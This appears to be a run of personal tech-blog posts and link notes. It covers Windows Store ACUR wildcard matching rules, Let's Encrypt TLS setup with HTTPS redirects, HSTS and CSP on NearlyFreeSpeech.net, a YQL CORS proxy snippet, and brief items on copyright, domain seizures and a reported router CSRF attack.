Application Content URI Rules (ACUR from now on) defines the bounds of the web that make up the Microsoft Store application. Package content via the ms-appx URI scheme is automatically considered part of the app. But if you have content on the web via http or https you can use ACUR to declare to Windows that those URIs are also part of your application. When your app navigates to URIs on the web those URIs will be matched against the ACUR to determine if they are part of your app or not. The documentation for how matching is done on the wildcard URIs in the ACUR Rule elements is not very helpful on MSDN so here are some notes.
You can have up to 100 Rule XML elements per ApplicationContentUriRules element. Each has a Match attribute that can be up to 2084 characters long. The content of the Match attribute is parsed with CreateUri and when matching against URIs on the web additional wildcard processing is performed. I’ll call the URI from the ACUR Rule the rule URI and the URI we compare it to found during app navigation the navigation URI.
The rule URI is matched to a navigation URI by URI component: scheme, username, password, host, port, path, query, and fragment. If a component does not exist on the rule URI then it matches any value of that component in the navigation URI. For example, a rule URI with no fragment will match a navigation URI with no fragment, with an empty string fragment, or a fragment with any value in it.
Each component except the port may have up to 8 asterisks. Two asterisks in a row counts as an escape and will match 1 literal asterisk. For scheme, username, password, query and fragment the asterisk matches whatever it can within the component.
For the host, if the host consists of exactly one single asterisk then it matches anything. Otherwise an asterisk in a host only matches within its domain name label. For example, http://*.example.com will match http://a.example.com/ but not http://b.a.example.com/ or http://example.com/. And http://*/ will match http://example.com, http://a.example.com/, and http://b.a.example.com/. However the Store places restrictions on submitting apps that use the http://* rule or rules with an asterisk in the second effective domain name label. For example, http://*.com is also restricted for Store submission.
For the path, an asterisk matches within the path segment. For example, http://example.com/a/*/c will match http://example.com/a/b/c and http://example.com/a//c but not http://example.com/a/b/b/c or http://example.com/a/c
Additionally for the path, if the path ends with a slash then it matches any path that starts with that same path. For example, http://example.com/a/ will match http://example.com/a/b and http://example.com/a/b/c/d/e/, but not http://example.com/b/.
If the path doesn’t end with a slash then there is no suffix matching performed. For example, http://example.com/a will match only http://example.com/a and no URIs with a different path.
As a part of parsing the rule URI and the navigation URI, CreateUri will perform URI normalization and so the hostname and scheme will be made lower case (casing matters in all other parts of the URI and case sensitive comparisons will be performed), IDN normalization will be performed, ‘.’ and ‘..’ path segments will be resolved and other normalizations as described in the CreateUri documentation.
Since I had last posted about using Let's Encrypt with NearlyFreeSpeech, NFS has changed their process for setting TLS info. Instead of putting the various files in /home/protected/ssl and submitting an assistance request, now there is a command to submit the certificate info and a webpage for submitting the certificate info.
The webpage is https://members.nearlyfreespeech.net/{username}/sites/{sitename}/add_tls
and has a textbox for you to paste in all the cert info in PEM form into the textbox. The
domain key, the domain certificate, and the Let's Encrypt intermediate cert must be pasted into the textbox and submitted.
Alternatively, that same info may be provided as standard input to nfsn -i set-tls
To renew my certificate with the updated NFS process I followed the commands from Andrei Damian-Fekete's script which depends on acme_tiny.py:
python acme_tiny.py --account-key account.key --csr domain.csr --acme-dir /home/public/.well-known/acme-challenge/ > signed.crt
wget -O - https://letsencrypt.org/certs/lets-encrypt-x3-cross-signed.pem > intermediate.pem
cat domain.key signed.crt intermediate.pem > chained.pem
nfsn -i set-tls < chained.pem
Because
my certificate had already expired I needed to comment out the section in acme_tiny.py that validates the challenge file. The filenames in the above map to the following:
2016-Nov-5: Updated post on using Let's Encrypt with NearlyFreeSpeech.net
I use NearlyFreeSpeech.net for my webhosting for my personal website and I've just finished setting up TLS via Let's Encrypt. The process was slightly more complicated than what you'd like from Let's Encrypt. So for those interested in doing the same on NearlyFreeSpeech.net, I've taken the following notes.
The standard Let's Encrypt client requires su/sudo access which is not available on NearlyFreeSpeech.net's servers. Additionally NFSN's webserver doesn't have any Let's Encrypt plugins installed. So I used the Let's Encrypt Without Sudo client. I followed the instructions listed on the tool's page with the addition of providing the "--file-based" parameter to sign_csr.py.
One thing the script doesn't produce is the chain file. But this topic "Let's Encrypt - Quick HOWTO for NSFN" covers how to obtain that:
curl -o domain.chn https://letsencrypt.org/certs/lets-encrypt-x1-cross-signed.pem
Now that you have all the required files, on your NFSN server make the directory /home/protected/ssl and copy your files into it. This is described in the NFSN topic provide certificates to NFSN. After copying the files and setting their permissions as described in the previous link you submit an assistance request. For me it was only 15 minutes later that everything was setup.
After enabling HTTPS I wanted to have all HTTP requests redirect to HTTPS. The normal Apache documentation on how to do this doesn't work on NFSN servers. Instead the NFSN FAQ describes it in "redirect http to https and HSTS". You use the X-Forwarded-Proto instead of the HTTPS variable because of how NFSN's virtual hosting is setup.
RewriteEngine on
RewriteCond %{HTTP:X-Forwarded-Proto} !https
RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [L,R=301]
Turning on HSTS is as simple as adding the HSTS HTTP header. However, the description in the above link didn't work because my site's NFSN realm isn't on the latest Apache yet. Instead I added the following to my .htaccess. After I'm comfortable with everything working well for a few days I'll start turning up the max-age to the recommended minimum value of 180 days.
Header set Strict-Transport-Security "max-age=3600;"
Finally, to turn on CSP I started up Fiddler with my CSP Fiddler extension. It allows me to determine the most restrictive CSP rules I could apply and still have all resources on my page load. From there I found and removed inline script and some content loaded via http and otherwise continued tweaking my site and CSP rules.
After I was done I checked out my site on SSL Lab's SSL Test to see what I might have done wrong or needed improving. The first time I went through these steps I hadn't included the chain file which the SSL Test told me about. I was able to add that file to the same files I had already previously generated from the Let's Encrypt client and do another NFSN assistance request and 15 minutes later the SSL Test had upgraded me from 'B' to 'A'.
A bogus SoundCloud takedown anecdote and a brief history of and issues with US copyright law.
Another reminder that the rest of the Western world has a public domain day every year in which new IP enters the public domain
Various folks on OpenGameArt have converted the now public domain Glitch art assets into SVG and PNG.
According to the links within this article, although the root URI of the router requires authentication, the /password.cgi URI doesn’t and the resulting returned HTML contains (but does not display) the plaintext of the password, as well as an HTML FORM to modify the password that is exploitable by CSRF.
The attack… infected more than 4.5 million DSL modems… The CSRF (cross-site request forgery) vulnerability allowed attackers to use a simple script to steal passwords required to remotely log in to and control the devices. The attackers then configured the modems to use malicious domain name system servers that caused users trying to visit popular websites to instead connect to booby-trapped imposter sites.
Seized shirt!
For the feds, it’s not enough to simply seize domain names without warning or due process—they want to make sure everyone knows the website operators were breaking the law, even if that has yet to be proven in court. That’s why every domain that gets seized ends up redirecting to one of these dramatic warning pages, replete with the eagle-emblazoned badges of the federal agencies involved.
During formalization of the WebFinger protocol [I-D.jones-appsawg-webfinger], much discussion occurred regarding the appropriate URI scheme to include when specifying a user’s account as a web link [RFC5988].
…
acctURI = “acct:” userpart “@” domainpart
Use of my old Hotmail account has really snuck up on me as I end up caring more and more about all of the services with which it is associated. The last straw is Windows 8 login, but previous straws include Xbox, Zune, SkyDrive, and my Windows 7 Phone. I like the features and sync'ing associated with the Windows Live ID, but I don't like my old, spam filled, hotmail email address on the Live ID account.
A coworker told me about creating a Live ID from a custom domain, which sounded like just the ticket for me. Following the instructions above I was able to create a new deletethis.net Live ID but the next step of actually using this new Live ID was much more difficult. My first hope was there would be some way to link my new and old Live IDs so as to make them interchangeable. As it turns out there is a way to link Live IDs but all that does is make it easy to switch between accounts on Live Mail, SkyDrive and some other webpages.
Instead one must change over each service or start over depending on the service:
In Win8 you login with a Windows Live account. If you hook up a custom domain to a Live account you can login with that custom domain.
Its all quite shocking.
Fourth , when I explained that the blog publisher had received music from the industry itself, a government attorney replied that authorization was an “affirmative defense” that need not be taken into account by the government in carrying out the seizure. That was stunning.
Another Comedy Bang Bang preview clip this time with Zach Galifianakis.
One of the more limiting issues of writing client side script in the browser is the same origin limitations of XMLHttpRequest. The latest version of all browsers support a subset of CORS to allow servers to opt-in particular resources for cross-domain access. Since IE8 there's XDomainRequest and in all other browsers (including IE10) there's XHR L2's cross-origin request features. But the vast majority of resources out on the web do not opt-in using CORS headers and so client side only web apps like a podcast player or a feed reader aren't doable.
One hack-y way around this I've found is to use YQL as a CORS proxy. YQL applies the CORS header to all its responses and among its features it allows a caller to request an arbitrary XML, HTML, or JSON resource. So my network helper script first attempts to access a URI directly using XDomainRequest if that exists and XMLHttpRequest otherwise. If that fails it then tries to use XDR or XHR to access the URI via YQL. I wrap my URIs in the following manner, where type is either "html", "xml", or "json":
yqlRequest = function(uri, method, type, onComplete, onError) {
var yqlUri = "http://query.yahooapis.com/v1/public/yql?q=" +
encodeURIComponent("SELECT * FROM " + type + ' where url="' + encodeURIComponent(uri) + '"');
if (type == "html") {
yqlUri += encodeURIComponent(" and xpath='/*'");
}
else if (type == "json") {
yqlUri += "&callback=&format=json";
}
...
This
also means I can get JSON data itself without having to go through JSONP.
This is Django Reinhardt’s Gypsy swing from the 30s and 40s on archive.org and it is all in the public domain. I didn’t know the term for the genre so it took me a while to find this.
There’s weird stuff you’d think is public domain but isn’t including Martin Luther King Jr.‘s “I Have a Dream” speech. FTA: ”If you want to watch the whole thing, legally, you’ll need to get the $20 DVD.
That’s because the King estate, and, as of 2009, the British music publishing conglomerate EMI Publishing, owns the copyright of the speech and its recorded performance.”
More amazing works entering public domain. A shame that US works take such an extreme amount of time.
“The syntax for allowed Top-Level Domain (TLD) labels in the Domain Name System (DNS) is not clearly applicable to the encoding of Internationalised Domain Names (IDNs) as TLDs. This document provides a concise specification of TLD label syntax based on existing syntax documentation, extended minimally to accommodate IDNs.” Still irritated about arbitrary TLDs.